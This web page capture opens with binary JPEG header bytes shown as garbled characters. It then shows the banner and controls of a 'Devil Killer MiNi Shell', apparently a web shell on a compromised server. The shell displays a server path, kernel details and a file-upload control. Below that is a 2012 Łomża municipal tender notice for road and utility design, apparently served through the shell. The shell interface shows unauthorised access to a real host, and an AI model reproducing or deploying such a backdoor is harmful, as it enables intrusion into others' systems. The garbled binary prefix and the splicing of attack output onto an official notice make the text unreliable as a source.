JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120628/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120628/226158-N-2012.html

<p class="kh_header"><b>Łomża: Wykonanie prac studyjno-koncepcyjnych dotyczących przygotowania terenów inwestycyjnych w rejonie ulic: Meblowej i Ciepłej w Łomży oraz opracowanie dokumentacji technicznej na uzbrojenie w/w terenów inwestycyjnych</b><br>
<b>Numer ogłoszenia: 226158 - 2012; data zamieszczenia: 28.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łomża , pl. Stary Rynek 14, 18-400 Łomża, woj. podlaskie, tel. 086 2156711, faks 086 2156706.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://um.lomza.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac studyjno-koncepcyjnych dotyczących przygotowania terenów inwestycyjnych w rejonie ulic: Meblowej i Ciepłej w Łomży oraz opracowanie dokumentacji technicznej na uzbrojenie w/w terenów inwestycyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace studyjno-koncepcyjne dotyczące przygotowania terenów inwestycyjnych o łącznej powierzchni ok. 5,2 ha, w rejonie ulic: Meblowej i Ciepłej w Łomży, opracowanie dokumentacji technicznej na uzbrojenie tych terenów oraz przygotowanie i złożenie wniosków o wydanie pozwoleń na wykonanie robót budowlanych w nich ujętych (decyzji
o zezwoleniu na realizację inwestycji drogowej i w zależności od okoliczności prawnych pozwoleń na budowę lub zgłoszeń).

Główne etapy  przedmiotu zamówienia :
I.	Prace studyjno-koncepcyjne dotyczące przygotowania terenów inwestycyjnych 
w rejonie ulic: Meblowej i Ciepłej w Łomży o łącznej powierzchni ok. 5,2 ha obejmujących działki nr  31323, 30409/1, 30410, 30391, 30427, 30428, 30429, 30430.
II.	Opracowanie dokumentacji technicznej na rozbudowę ulicy  Meblowej - 3KD-G    
z uzbrojeniem na odcinku od ul. Wojska Polskiego (droga krajowa) do skrzyżowania 
z ulicą 4KD-L wraz z tym skrzyżowaniem (odcinek ulicy o dł. ok. 700 m z dwiema jezdniami ), budowę ulic z uzbrojeniem: odcinka ulicy 4KD-L od skrzyżowania 
z ul. Meblową do skrzyżowania z ulicami 9KD-L i 10KD-L wraz ze skrzyżowaniem tych ulic (odcinek ulicy o dł. ok. 320 m jednojezdniowy), ulicy 9KD-L (ulica o dł. ok. 580 m  jednojezdniowa), odcinka ulicy 8KD-L (odcinek ulicy o dł. ok. 200 m jednojezdniowy od skrzyżowania z ul. Ciepłą do skrzyżowania z ul. Forteczną (aktualna nazwa ulicy Strzelnicza).
III.	Opracowanie dokumentacji technicznej na budowę ulicy 3KD Meblowej-G 
z uzbrojeniem na odcinku od skrzyżowania z ulicą 4KD-L do ronda w ciągu 
ul.  Poznańskiej (odcinek ulicy o dł. ok. 800 m z dwiema jezdniami ).
IV.	Uzyskanie decyzji o środowiskowych uwarunkowaniach.
V.	Złożenie wniosków o decyzje zezwalające na realizację inwestycji drogowej zgodnie 
z ustawą z dnia 10.04.2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
VI.	Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego  i pozwolenia (ń) na budowę dla infrastruktury technicznej - poza pasami drogowymi rozbudowywanych 
i budowanych ulic (jeśli będą wymagane).
VII.	Uzyskanie pozwolenia wodnoprawnego na budowę przepustów (jeśli takie rozwiązania wystąpią w dokumentacji).
VIII.	Opracowanie wszelkiej dokumentacji potrzebnej do wniosków o wydanie decyzji ZRID, ustalenia lokalizacji celu publicznego, pozwolenia wodnoprawnego, pozwolenia na budowę, dokonanie zgłoszenia zamiaru wykonania robót.
IX.	Opracowanie dokumentacji geodezyjno-prawnej.
X.	Pełnienie nadzoru autorskiego.
Zamawiane opracowania projektowe muszą uwzględniać ustalenia i wytyczne zawarte   
w obowiązującym miejscowym planie zagospodarowania przestrzennego części miasta Łomża (rejon ulic: Wojska Polskiego, Poznańskiej i projektowanej ulicy stanowiącej przedłużenie ulicy Meblowej), w granicach którego położone są w/w tereny inwestycyjne i planowane ulice. Uchwała nr 332/XLVI/09 z dnia 24.06.2009 r. w sprawie przedmiotowego planu jest zamieszczona na stronie BIP Urzędu Miejskiego w Łomży - zakładki: zagospodarowanie przestrzenne lub prawo miejscowe  - zał.  nr 10 do SIWZ  - należy się z nią zapoznać przed przygotowaniem oferty.

ZAKRES PRAC STUDYJNO-KONCEPCYJNYCH:

A. Opracowanie koncepcji zagospodarowania terenu/ strefy inwestycji (w tym oceny stanu infrastruktury technicznej  i analizy kosztowej uzbrojenia i dróg).
B. Wykonanie kompleksowych badań geotechnicznych, w tym określenie warstw geologicznych, nośności gruntu, poziomu lustra wód gruntowych.
C. Opracowania o klimacie inwestycyjnym dla danej lokalizacji.
D. Harmonogram procesu inwestycyjnego.
ZAKRES ZAMÓWIENIA dot. OPRACOWANIA DOKUMENTACJI TECHNICZNYCH ORAZ PRZYGOTOWANIA I ZŁOŻENIA WNIOSKÓW O WYDANIE POZWOLEŃ NA WYKONANIE ROBÓT BUDOWLANYCH 
Dokumentacje projektowe muszą być opracowane zgodnie z wymaganiami dla udzielenia zamówień na realizację robót w nich ujętych w procedurze zamówień publicznych uregulowanych w ustawie z dnia 29.01.2004r.  Prawo zamówień publicznych (Dz. U.  z 2010 r. Nr 113 poz. 759 
z późniejszymi zmianami) oraz przepisach prawa unijnego. 
1. W ramach zamówienia należy:
-	wykonać kopię aktualnej mapy do celów projektowych  w skali 1:500 potrzebną do wykonania przedmiotowych dokumentacji,
-	pozyskać mapę ewidencji gruntów z czytelnymi numerami wszystkich działek obejmującą teren inwestycji oraz terenów bezpośrednio przylegających do niego,
-	pozyskać aktualne wypisy z rejestru gruntów dla działek wchodzących w zakres inwestycji 
i dla działek sąsiednich,
-	przygotować mapę ewidencji gruntów z naniesioną zajętością terenu pod projektowane ulice (obrys np. kolorem czerwonym) wraz z zaznaczeniem potrzebnej zajętości terenu jako czasowe wejścia poza pasy drogowe budowanych ulic, 
-	sporządzić zestawienie numerów działek, na które występuje wejście zarówno 
z projektowaną ulicą jak i infrastrukturą techniczną z wyszczególnieniem dla nich wykazu właścicieli, współwłaścicieli i rodzaju wejścia,
-	uzyskać decyzję określającą środowiskowe uwarunkowania realizacji przedsięwzięcia -przygotować i złożyć wniosek o wydanie w/w decyzji, opracować raport  o oddziaływaniu przedsięwzięcia na środowisko (jeśli będzie wymagany),
-	uzyskać decyzję o ustalenie lokalizacji inwestycji celu publicznego (dla odcinka kanalizacji deszczowej i innych projektowanych części inwestycji - przygotować i złożyć wniosek(ki) 
o wydanie w/w decyzji, jeśli okażą się potrzebne)
-	uzyskać pozwolenie wodnoprawne na budowę przepustów (jeśli zostaną zaprojektowane) - przygotować i złożyć wniosek o wydanie w/w decyzji, 


-	sporządzić stosowną dokumentację geodezyjno-prawną dla wszystkich działek położonych w liniach rozgraniczających teren inwestycji.
Dokumentacja geodezyjno-prawna powinna zawierać;
1.	aktualne badania stanu prawnego nieruchomości położonych w liniach rozgraniczających ulic i innego terenu inwestycji ze szczególnym uwzględnieniem terenów objętych wnioskami o uzyskanie decyzji ZRID,
2.	sporządzenie dokumentacji niezbędnej do wprowadzenia zmian w księgach wieczystych (w przypadku stwierdzenia niezgodności stanu ewidencyjnego i wieczysto-księgowego) dotyczących nieruchomości wskazanych w pkt.1 obejmującej m.in. wykazy synchronizacyjne, opracowania geodezyjne z: rozdzielenia połączonych 
w działce ewidencyjnej nieruchomości, zmian konfiguracji, powierzchni działek ewidencyjnych,
3.	sporządzenie projektów podziałów nieruchomości przeznaczonych pod pasy drogowe,
4.	sporządzenie zbiorczych map podziału działek (jeden na odcinek ul. Meblowej od skrzyżowania z ul. 4KD-L do ronda w ciągu ul. Poznańskiej, drugi dla pozostałych odcinków ulic oraz gdy będzie wynikało z rozwiązań projektowych na poszerzenie pasa drogowego ul. Wojska Polskiego) - każdy w 4 egz.

-	wykonać projekty budowlane na rozbudowę odcinka ul. Meblowej 3KD-G od  ul. Wojska Polskiego do skrzyżowania z ul. 4KD-L wraz ze skrzyżowaniem z ul. Wojska Polskiego 
i budowę ulic: odcinka ulicy  4KD-L od skrzyżowania z ul. Meblową do skrzyżowania 
z ulicami 9KD-L i 10KD-L, wraz z tym skrzyżowaniem, ulicy 9KD-L, odcinka ulicy 8KD-L od skrzyżowania z ul. Ciepłą do granicy z pasem drogowym ul. Fortecznej (obecna nazwa ulicy Strzelnicza) - obejmujące wykonanie jezdni, chodników, ścieżek rowerowych, kanalizacji deszczowej, oświetlenia, linii światłowodowej w kanale technologicznym, wodociągu i kanalizacji sanitarnej - w podziale wynikającym z wymogów prawnych dotyczących zakresów wniosków o uzyskanie decyzji na wykonanie robót, 
-	wykonać projekty wykonawcze drogowe dla w/w odcinków ulic,
-	wykonać projekty wykonawcze kanalizacji deszczowej dla w/w odcinków ulic,
-	wykonać projekt wykonawcze oświetlenia w/w odcinków ulic,
-	wykonać projekty wykonawcze dla budowy kanalizacji sanitarnej w w/w odcinkach ulic,
-	wykonać projekty wykonawcze dla budowy wodociągów w w/w odcinkach ulic,
-	wykonać projekty wykonawcze dla budowy linii światłowodowej w kanale technologicznym  w w/w odcinkach ulic, 
-	wykonać projekty stałej organizacji ruchu dla w/w odcinków ulic,
-	wykonać projekty branżowe na konieczne przebudowy istniejącego uzbrojenia wynikające
 z kolizji z drogą,  i projektowanym uzbrojeniem (w zakres ten wchodzą także wszelkie regulacje i potrzebne wymiany istniejących studni urządzeń podziemnych), 
-	wykonać inwentaryzację drzew i krzewów do usunięcia - z określeniem ich gatunków 
i obwodu pnia (jeśli znajdą się w kolizji z projektowanym zagospodarowaniem pasów drogowych), 
-	wykonać projekt budowlany na budowę odcinka kanalizacji deszczowej poza pasem drogowym ulicy,
-	wykonać projekt wykonawczy kanalizacji deszczowej poza pasem drogowym,
-	opracować operat wodnoprawny wraz z załącznikami do wniosku o uzyskanie pozwolenia wodnoprawnego na  budowę przepustów pod jezdniami ulicy Meblowej na skrzyżowaniu 
z ul. Wojska Polskiego (jeśli takie rozwiązania wystąpią w dokumentacji projektowej),

-	wykonać projekt budowlany na budowę odcinka ulicy Meblowej 3KD-G od  skrzyżowania 
z ul. 4KD-L do ronda w ciągu ul. Poznańskiej - na wykonanie jezdni, chodników, ścieżek rowerowych, kanalizacji deszczowej, oświetlenia, kanału technologicznego,
-	wykonać projekt wykonawczy drogowy dla w/w odcinka ulicy,
-	wykonać projekt wykonawczy kanalizacji deszczowej w w/w odcinku ulicy,
-	wykonać projekt wykonawczy oświetlenia w/w odcinka ulicy,
-	wykonać projekt wykonawczy dla budowy kanału technologicznego w w/w odcinku ulicy, 
-	wykonać projekt stałej organizacji ruchu dla w/w odcinka ulicy,
-	wykonać projekty branżowe na konieczne przebudowy istniejącego uzbrojenia wynikające 
z kolizji z drogą,  i projektowanym uzbrojeniem ( w zakres ten wchodzą także wszelkie regulacje i potrzebne wymiany istniejących studni urządzeń podziemnych), 
-	wykonać inwentaryzację drzew i krzewów do usunięcia - z określeniem ich gatunków 
i obwodu pnia ( jeśli znajdą się w kolizji z projektowanym zagospodarowaniem pasów drogowych), 

-	złożyć dwa odrębne wnioski o decyzje ZRID (jeden dla budowy ulicy Meblowej od skrzyżowania z ul. 4KD-L do ronda w ciągu ul. Poznańskiej, drugi dot. rozbudowy i  budowy pozostałych projektowanych ulic) i ewentualnie trzeci gdy rozwiązanie skrzyżowania 
ul. Meblowej z ul. Wojska Polskiego wymagało będzie pozyskania gruntu pod poszerzenie pasa drogowego ul. Wojska Polskiego - przygotować wszystkie wymagane dokumenty wchodzące w zakres wniosków (zgodnie z wymogami ustawy z dnia 10.04.2003 r. 
o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych -tekst jednolity Dz.U. z 2008 r. Nr 193, poz. 1194 z późniejszymi zmianami), w tym uzyskać wszystkie potrzebne decyzje administracyjne (m.in. pozwolenie wodnoprawne - jeśli będzie potrzebne) i opinie (między innymi: zarządu województwa, zarządu powiatu, prezydenta miasta, wojewódzkiego konserwatora zabytków, dyrektora właściwego RZGW, innych organów wymaganych przepisami szczególnymi),
-	złożyć wnioski o pozwolenia na budowę (zgłoszenia) na zakresy robót, dla których taka procedura będzie właściwa dla uzyskania pozwolenia na realizację robót.
-	dokonać trwałej stabilizacji znaków granicznych nowo wydzielonych granic działek i okazać je w terenie przedstawicielowi Wydziału Gospodarowania Nieruchomościami Urzędu Miejskiego w Łomży i Rzeczoznawcy majątkowemu wskazanemu do wyceny gruntów przeznaczonych pod pasy drogowe po wydaniu decyzji ZRID.
-	opracować Specyfikacje Techniczne Wykonania i Odbioru Robót .
-	opracować przedmiary robót  -	wykonać kosztorysy inwestorskie -	opracować dla każdego zakresu robót informację  dotyczącą bezpieczeństwa i ochrony zdrowia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Wykonanie projektów budowlanych i wykonawczych wodociągu i kanalizacji sanitarnej w odcinku ulicy Meblowej od skrzyżowania z ul. 4KD-L do ronda w ciągu ul. Poznańskiej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.33.20.00-4, 71.33.00.00-0, 71.24.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca wnosi wadium w wysokości: 5000 zł.
2.	Wadium wnosi się przed upływem terminu składania  ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się należytym wykonaniem min. 3 prac projektowych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - odpowiadających swoim rodzajem opracowaniom stanowiącym główny przedmiot niniejszego zamówienia (wykonanie kompletnej dokumentacji technicznej na budowę lub przebudowę ulic obejmującą oprócz robót drogowych budowę lub przebudowę następującego uzbrojenia: kanalizacji deszczowej, oświetlenia, kanału technologicznego i ewentualnie innych sieci, składającej się z projektów budowlanych i wykonawczych, specyfikacji technicznych wykonania i odbioru robót, informacji BIOZ, przedmiarów robót i kosztorysów inwestorskich),  z których jedno opracowanie musi być dokumentacją na budowę lub przebudowę ulic o łącznej o długości min. 1000 m.
  
Ocena spełnienia tego warunku będzie dokonana na podstawie  przedłożonego  przez Wykonawcę Wykazu prac i dokumentów potwierdzających, że wyszczególnione w nim prace zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować co najmniej po jednej osobie:
- które posiadają uprawnienia bez ograniczeń do projektowania dróg, sieci wodociągowych, kanalizacyjnych, cieplnych, gazowych, elektrycznych i elektroenergetycznych oraz telekomunikacyjnych  oraz  
- która posiada uprawnienia geodezyjne w zakresie rozgraniczeń i podziałów nieruchomości. 

Ocena spełnienia tego warunku będzie dokonana na podstawie:
- dostarczonego przez Wykonawcę Wykazu osób, które będą uczestniczyć  w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  oraz informacją o podstawie dysponowania tymi osobami i  
- dostarczonego oświadczenia, że osoby, które będą wskazane w wykazie na projektantów  posiadają wymagane uprawnienia do sprawowania tych funkcji -  we właściwych zakresach  i odpowiednich specjalnościach oraz osoba wskazana do wykonania dokumentacji geodezyjno-prawnej posiada właściwe uprawnienia do jej wykonania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100.000 zł tj. kwotę odszkodowania, jaką gwarantuje ubezpieczyciel (po uwzględnieniu ewentualnej franszyzy redukcyjnej).
 
Ocena spełnienia tego warunku będzie dokonana na podstawie:
- dostarczonej przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca polegający na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów musi przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 2. Uproszczona kalkulacja ceny oferty. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty musi być dołączone dla podmiotu wiodącego - pełnomocnictwo do reprezentowania ich w postępowaniu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W przypadku, gdy nie będzie wymagany raport w sprawie oddziaływania przedsięwzięcia na środowisko, (nie zostanie sporządzony) wynagrodzenie Projektanta zostanie zmniejszone, 
o kwotę jaką  przewidział Projektant w  ofercie za jego sporządzenie (podanej w kalkulacji ceny oferty). 
2.	Dopuszcza się zmianę terminu wykonania przedmiotu umowy, z przyczyn niezależnych od którejkolwiek ze stron, a związanych z wydłużaniem się procedur administracyjnych (wydania warunków do projektowania, decyzji, opiniowania przez organy itp.), jednakże pod warunkiem, że Projektant złoży niezbędne dokumenty do organów administracji i innych z wyprzedzeniem, uwzględniającym długość standardowej procedury.
3.	Dopuszcza się zmianę wysokości wynagrodzenia umownego w przypadku ustawowej zmiany obowiązującej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.lomza.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomży, ul. Stary Rynek 14, 18-400 Łomża, pok. nr 217 II piętro.</p>
